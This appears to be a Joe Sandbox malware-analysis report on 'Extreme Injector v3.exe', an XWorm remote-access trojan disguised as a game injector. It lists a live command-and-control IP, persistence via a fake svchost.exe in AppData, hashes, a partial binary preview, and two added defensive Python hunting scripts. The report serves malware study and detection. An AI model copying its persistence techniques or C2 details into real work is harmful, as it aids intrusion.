  Source: Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp; Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002639000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high

https://contoso.com/Icon
  Source: powershell.exe, 0000000B.00000002.2256933254.0000016552542000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high

http://osoft.com/pki/ceooCerAut_2010-06
  Source: powershell.exe, 00000007.00000002.2031373620.000001C0F4863000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown

https://aka.ms/pscore68
  Source: powershell.exe, 00000001.00000002.1722348335.000001B2A0DF1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.1783319483.0000012E61FD1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.1917701450.000001C0DC4E1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.2076420987.00000165424D1000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
  Source: Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002639000.00000004.00000800.00020000.00000000.sdmp; Extreme Injector v3.exe, 00000000.00000002.2923795440.0000000002591000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000001.00000002.1722348335.000001B2A0DF1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000004.00000002.1783319483.0000012E61FD1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000007.00000002.1917701450.000001C0DC4E1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.2076420987.00000165424D1000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high

http://www.micom/pki/certs/Miut_2010-06-23.cr
  Source: powershell.exe, 00000007.00000002.2031373620.000001C0F4863000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown

http://schemas.microsoft.co
  Source: powershell.exe, 00000004.00000002.1876479990.0000012E7A812000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown

https://github.com/Pester/Pester
  Source: powershell.exe, 0000000B.00000002.2076420987.00000165426F8000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high

http://crl.micros
  Source: powershell.exe, 00000001.00000002.1751532684.000001B2B9310000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: -; Reputation: high
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
147.185.221.24 | or-officials.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1582591
                                                                Start date and time:2024-12-31 00:47:06 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 16s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:20
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:Extreme Injector v3.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@20/20@2/2
                                                                EGA Information:
                                                                • Successful, ratio: 12.5%
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 79
                                                                • Number of non-executed functions: 7
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                • Excluded IPs from analysis (whitelisted): 172.202.163.200, 20.109.210.53, 13.107.246.45
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target powershell.exe, PID 3444 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 7520 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 7784 because it is empty
                                                                • Execution Graph export aborted for target powershell.exe, PID 8084 because it is empty
                                                                • Execution Graph export aborted for target svchost.exe, PID 7608 because it is empty
                                                                • Execution Graph export aborted for target svchost.exe, PID 7852 because it is empty
                                                                • Execution Graph export aborted for target svchost.exe, PID 7932 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • VT rate limit hit for: Extreme Injector v3.exe
Timeline (Time | Type | Description)
18:48:00 | API Interceptor | 45x Sleep call for process: powershell.exe modified
18:49:09 | API Interceptor | 96x Sleep call for process: Extreme Injector v3.exe modified
23:49:03 | Task Scheduler | Run new task: svchost path: C:\Users\user\AppData\Roaming\svchost.exe
23:49:07 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
23:49:16 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Roaming\svchost.exe
23:49:24 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
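The timeline above shows the same dropped binary, a file named svchost.exe living in the user's AppData\Roaming folder, being persisted three ways: a scheduled task, the HKCU Run key (the report lists it twice, once as HKCU and once as the HKCU64 view), and a .lnk in the Startup folder. A hunt for this pattern needs two checks: does a Windows system-binary name execute from outside its normal directory, and how many launch mechanisms point at that file. The Python below is an added example, not Joe Sandbox's code; the record layout and the sample records are constructed here to mirror the timeline entries, and the list of system binary names is deliberately short.

```python
# Added illustration (not Joe Sandbox code): correlate persistence records that
# point at a system-named binary living outside its normal directory. The
# record layout below is constructed for this example, not a real tool's log
# format; on a live host the records would come from the Run key, the task
# scheduler and the Startup folder.
import ntpath
from collections import defaultdict

# Binaries that legitimately live only in the directories listed below.
# Assumption: a short list is enough here; a real hunt would use a fuller one.
SYSTEM_BINARY_NAMES = {
    "svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "services.exe",
    "smss.exe", "dllhost.exe", "rundll32.exe", "explorer.exe",
}
# Exact directory matches on purpose: a prefix test would wave through
# C:\Windows\Temp\svchost.exe, which is still user-writable.
TRUSTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows"}


def is_location_anomaly(path: str) -> bool:
    """True when a Windows system binary name executes from a non-system directory."""
    name = ntpath.basename(path).lower()
    if name not in SYSTEM_BINARY_NAMES:
        return False
    directory = ntpath.dirname(path).lower().rstrip("\\")
    return directory not in TRUSTED_DIRS


def persistence_by_target(records):
    """Map each persisted executable to the set of mechanisms that launch it.
    The HKCU and HKCU64 Run-key records for one target collapse into one entry."""
    by_target = defaultdict(set)
    for rec in records:
        by_target[rec["target"].lower()].add(rec["mechanism"])
    return by_target


def triage(records):
    """Return findings for targets that are both persisted and location-anomalous."""
    findings = []
    for target, mechanisms in persistence_by_target(records).items():
        if is_location_anomaly(target):
            findings.append({"target": target, "mechanisms": sorted(mechanisms)})
    return findings


# Constructed sample records, modelled on the report's timeline entries.
SAMPLE_RECORDS = [
    {"mechanism": "scheduled_task", "name": "svchost",
     "target": r"C:\Users\user\AppData\Roaming\svchost.exe"},
    {"mechanism": "run_key",
     "name": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svchost",
     "target": r"C:\Users\user\AppData\Roaming\svchost.exe"},
    {"mechanism": "run_key",
     "name": r"HKCU64\Software\Microsoft\Windows\CurrentVersion\Run\svchost",
     "target": r"C:\Users\user\AppData\Roaming\svchost.exe"},
    {"mechanism": "startup_lnk",
     "name": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk",
     "target": r"C:\Users\user\AppData\Roaming\svchost.exe"},
    # Benign control: a per-user updater in AppData, but not a system binary name.
    {"mechanism": "run_key",
     "name": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "target": r"C:\Users\user\AppData\Local\Vendor\updater.exe"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS):
        print(f"{finding['target']}: persisted via {', '.join(finding['mechanisms'])}")
```

The directory check is an exact match rather than a prefix match so that a copy dropped into a writable subfolder of C:\Windows is still flagged; the benign control record shows that a non-system name in AppData does not fire on its own, which keeps the rule from alerting on ordinary per-user software.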
Context by IP (Match / Associated Sample Name or URL | Detection | Threat Name | Context)

208.95.112.1
  VegaStealer_v2.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer | ip-api.com/json/?fields=61439
  SharcHack.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig | ip-api.com/json/
  SharcHack.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer | ip-api.com/json/?fields=61439
  987656789009800.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
  good.exe | malicious | PureLog Stealer, zgRAT | ip-api.com/json/
  Client-built.exe | malicious | Quasar | ip-api.com/json/
  DHL AWB-documents.lnk | malicious | Divulge Stealer | ip-api.com/json/?fields=225545
  main.exe | malicious | Python Stealer, Discord Token Stealer, PRYSMAX STEALER | ip-api.com/json/8.46.123.189?fields=192511
  main.exe | malicious | Unknown | ip-api.com/json/8.46.123.189?fields=192511
  HX Design.exe | malicious | Python Stealer, Blank Grabber | ip-api.com/json/?fields=225545

147.185.221.24
  test.exe | malicious | DarkComet | -
  L363rVr7oL.exe | malicious | Njrat | -
  horrify's Modx Menu v1.exe | malicious | XWorm | -
  fvbhdyuJYi.exe | malicious | XWorm | -
  8DiSW8IPEF.exe | malicious | XWorm | -
  KJhsNv2RcI.exe | malicious | XWorm | -
  PjGz899RZV.exe | malicious | XWorm | -
  ehxF3rusxJ.exe | malicious | XWorm | -
  Client-built-Playit.exe | malicious | Quasar | -
  file.exe | malicious | ScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, Xmrig | -

Context by domain (Match / Associated Sample Name or URL | Detection | Threat Name | Context)

ip-api.com
  VegaStealer_v2.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer | 208.95.112.1
  SharcHack.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig | 208.95.112.1
  SharcHack.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer | 208.95.112.1
  987656789009800.exe | malicious | AgentTesla | 208.95.112.1
  good.exe | malicious | PureLog Stealer, zgRAT | 208.95.112.1
  Client-built.exe | malicious | Quasar | 208.95.112.1
  DHL AWB-documents.lnk | malicious | Divulge Stealer | 208.95.112.1
  main.exe | malicious | Python Stealer, Discord Token Stealer, PRYSMAX STEALER | 208.95.112.1
  main.exe | malicious | Unknown | 208.95.112.1
  HX Design.exe | malicious | Python Stealer, Blank Grabber | 208.95.112.1

Context by ASN (Match / Associated Sample Name or URL | Detection | Threat Name | Context)

TUT-ASUS
  VegaStealer_v2.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer | 208.95.112.1
  SharcHack.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig | 208.95.112.1
  SharcHack.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer | 208.95.112.1
  987656789009800.exe | malicious | AgentTesla | 208.95.112.1
  good.exe | malicious | PureLog Stealer, zgRAT | 208.95.112.1
  http://au.kirmalk.com/watch.php?vid=7750fd3c8 | malicious | Unknown | 162.252.214.4
  Client-built.exe | malicious | Quasar | 208.95.112.1
  DHL AWB-documents.lnk | malicious | Divulge Stealer | 208.95.112.1
  main.exe | malicious | Python Stealer, Discord Token Stealer, PRYSMAX STEALER | 208.95.112.1
  main.exe | malicious | Unknown | 208.95.112.1

SALSGIVERUS
  OneDrive.exe | malicious | Quasar | 147.185.221.22
  gReXLT7XjR.exe | malicious | Njrat | 147.185.221.18
  _____.exe | malicious | DarkComet | 147.185.221.23
  test.exe | malicious | DarkComet | 147.185.221.24
  L363rVr7oL.exe | malicious | Njrat | 147.185.221.24
  WO.exe | malicious | Metasploit | 147.185.221.23
  reddit.exe | malicious | Metasploit | 147.185.221.23
  loligang.mpsl.elf | malicious | Mirai | 147.176.119.110
  horrify's Modx Menu v1.exe | malicious | XWorm | 147.185.221.24
  fvbhdyuJYi.exe | malicious | XWorm | 147.185.221.24
                                                                                    No context
                                                                                    No context
                                                                                    Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):654
                                                                                    Entropy (8bit):5.380476433908377
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
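Each dropped-file entry in this report carries the same triage fields: size, an 8-bit entropy figure, an Encrypted verdict, a coarse file type, and MD5/SHA1/SHA-256/SHA-512 digests. The Python below is an added example, not Joe Sandbox's code, that recomputes those fields for arbitrary bytes so an analyst can compare a file pulled from a host against the report's table. The inputs are constructed here: the AppLocker probe text exactly as a later preview in this section prints it (59 bytes, so it will not reproduce the 60-byte file's hashes), a zero-filled 64-byte buffer, and 256 uniform bytes. The entropy cutoff for "likely encrypted" is an assumption, not a Joe Sandbox value.

```python
# Added example (not Joe Sandbox code): recompute the per-file triage fields a
# sandbox lists for a dropped file (size, 8-bit entropy, hashes, coarse type)
# and flag likely encrypted or packed payloads. Sample inputs are constructed;
# the entropy cutoff is an assumption, not a Joe Sandbox value.
import hashlib
import math
from collections import Counter

HIGH_ENTROPY = 7.2  # assumption: above this, data is typically compressed or encrypted


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for one repeated value, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_type(data: bytes) -> str:
    """Coarse classification in the spirit of a sandbox's File Type column."""
    if data[:2] == b"MZ":
        return "PE executable (MZ header)"
    if data and all(0x20 <= b < 0x7F or b in b"\t\r\n" for b in data):
        if b"\n" in data or b"\r" in data:
            return "ASCII text"
        return "ASCII text, with no line terminators"
    return "data"


def triage_file(data: bytes) -> dict:
    """Return the fields an analyst compares against a sandbox's dropped-file table."""
    entropy = shannon_entropy(data)
    return {
        "size": len(data),
        "file_type": file_type(data),
        "entropy": entropy,
        "likely_encrypted": entropy >= HIGH_ENTROPY,
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha512": hashlib.sha512(data).hexdigest(),
    }


# Constructed inputs: the AppLocker probe text as the report preview prints it
# (59 bytes here; the report records 60 for the real file, so the digests will
# differ), a zero-filled 64-byte buffer, and one of every byte value.
SAMPLES = {
    "applocker_probe": b"# PowerShell test file to determine AppLocker lockdown mode",
    "zero_filled": bytes(64),
    "uniform": bytes(range(256)),
}

if __name__ == "__main__":
    for label, blob in SAMPLES.items():
        fields = triage_file(blob)
        print(label, fields["size"], fields["file_type"], round(fields["entropy"], 3),
              fields["likely_encrypted"], fields["sha256"])
```

A low entropy figure like the 0.35 reported for the 64-byte "data" file indicates a mostly-constant buffer, while plain text sits around 4 to 5 bits per byte as the CSV and probe files do; only values near 8 suggest the file is compressed or encrypted, which is why the report marks all of these as not encrypted.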
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):0.34726597513537405
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nlll:Nll
                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                    Malicious:false
                                                                                    Preview:@...e...........................................................
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Users\user\Desktop\Extreme Injector v3.exe
                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Dec 30 22:49:03 2024, mtime=Mon Dec 30 22:49:03 2024, atime=Mon Dec 30 22:49:03 2024, length=70656, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):764
                                                                                    Entropy (8bit):5.047070908321926
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:8f0BlE24MfMWCegdY//8++JLAvUniojAsprHkk/bPKqKEBmV:88T+yHg+UvFchsAspIkzLBm
                                                                                    MD5:65EECC9046069021D0DB6120A6861BC3
                                                                                    SHA1:930433CF29DEF9E5AFA5652BE7F2C7919523C07E
                                                                                    SHA-256:67FFEF80CB97EC995ED2F9263813CD98DB8C8120B2900709CA8F55866FD5CD20
                                                                                    SHA-512:243D089FF86D562B86D41756F7EC2FDFA927FCD305713B216D83989904C700CD6B964BDC47AA7674C734F2F9488B5073E3BFB1610E9B6179F6180677DE1239DA
                                                                                    Malicious:false
                                                                                    Preview:L..................F.... ......g.[...tFh.[.....g.[..........................v.:..DG..Yr?.D..U..k0.&...&......vk.v......+;.[..E:,h.[......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......CW.^.Y............................mX..R.o.a.m.i.n.g.....b.2......Y". .svchost.exe.H......Y"..Y"...........................w..s.v.c.h.o.s.t...e.x.e.......Y...............-.......X..............\.....C:\Users\user\AppData\Roaming\svchost.exe........\.....\.....\.....\.....\.s.v.c.h.o.s.t...e.x.e.`.......X.......016477...........hT..CrF.f4... ..........,.......hT..CrF.f4... ..........,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                    Process:C:\Users\user\Desktop\Extreme Injector v3.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):70656
                                                                                    Entropy (8bit):5.810994040072963
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:4wHTuFxg03F76Bb57HQQI6y0aOjla/bqQMuof6W:4wqE017qb5kQQhOjlCqB6W
                                                                                    MD5:C55BAF4BB32F9FE3D218F67CA63CA5B8
                                                                                    SHA1:7C527E04B3E4EBAA8394600221A1FCEBE7695BE8
                                                                                    SHA-256:DEFB2C3AB19F9ABF691EB50B39D3407EB0157D67BCEC4C3F73F261E9B5400C96
                                                                                    SHA-512:69FFD17E08CB332F1F1D50AD3F31AEAD3172B917F13127D672258BC7519A675EC1394277885C4F3DA378E8D2201D9556AF6B2270433567DE07F3760191D48907
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Sekoia.io
                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rg.....................D......N.... ........@.. ....................................@.....................................K........@...................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc....@.......B..................@..@.reloc.......`......................@..B................0.......H........\..8.......&.....................................................(....*.r...p*. 6...*..(....*.r...p*. ...*.s.........s.........s.........s.........*.r=..p*. {...*.r[..p*. ilc.*.ry..p*. j...*.r...p*. 9bN.*.r...p*. .|..*..((...*.r...p*. ...*.r...p*. S...*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(X...*&(....&+.*.+5si... .... .'..oj...(*...~....-.(\...(N...~....ok...&.-.*.r...p*. ..e.*.r...p*. E/..*.r5..p*. S...*.rS..p*.rq..p*. ..U.*.r...p*. V.Z.*.r...p*. .8F.*.r...p
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 5.810994040072963
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: Extreme Injector v3.exe
File size: 70'656 bytes
MD5: c55baf4bb32f9fe3d218f67ca63ca5b8
SHA1: 7c527e04b3e4ebaa8394600221a1fcebe7695be8
SHA256: defb2c3ab19f9abf691eb50b39d3407eb0157d67bcec4c3f73f261e9b5400c96
SHA512: 69ffd17e08cb332f1f1d50ad3f31aead3172b917f13127d672258bc7519a675ec1394277885c4f3da378e8d2201d9556af6b2270433567de07f3760191d48907
SSDEEP: 1536:4wHTuFxg03F76Bb57HQQI6y0aOjla/bqQMuof6W:4wqE017qb5kQQhOjlCqB6W
TLSH: DC639E48B7A54526D2FD1FF558B22121C771A3238933DB1F38D944DA2B23A8D8E513FA
File Content Preview:
Icon Hash: 230b12240c1fcde7
Entrypoint: 0x40ec4e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x6772D4D9 [Mon Dec 30 17:14:01 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xec00 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10000 | 0x40d6 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x16000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xcc54 | 0xce00 | 0a236e99e6d4a76244a69276ae1e440a | False | 0.5853496662621359 | data | 6.031232990767861 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x10000 | 0x40d6 | 0x4200 | 4ee11a52bb492b0218e8a1ef76b95795 | False | 0.4412878787878788 | data | 4.620825691020089 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x16000 | 0xc | 0x200 | 1791cda89f2bbf3405f75542513c3fe8 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x10190 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.42271784232365145
RT_ICON | 0x12738 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.5051594746716698
RT_ICON | 0x137e0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.5407801418439716
RT_GROUP_ICON | 0x13c48 | 0x30 | data | | | 0.8541666666666666
RT_VERSION | 0x13c78 | 0x274 | data | | | 0.4538216560509554
RT_MANIFEST | 0x13eec | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041

DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-31T00:49:24.694825+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49823 | 147.185.221.24 | 43985 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 00:47:59.399676085 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 31, 2024 00:47:59.404541016 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Dec 31, 2024 00:47:59.404603004 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 31, 2024 00:47:59.405189991 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 31, 2024 00:47:59.409986019 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Dec 31, 2024 00:47:59.908580065 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Dec 31, 2024 00:47:59.956079006 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
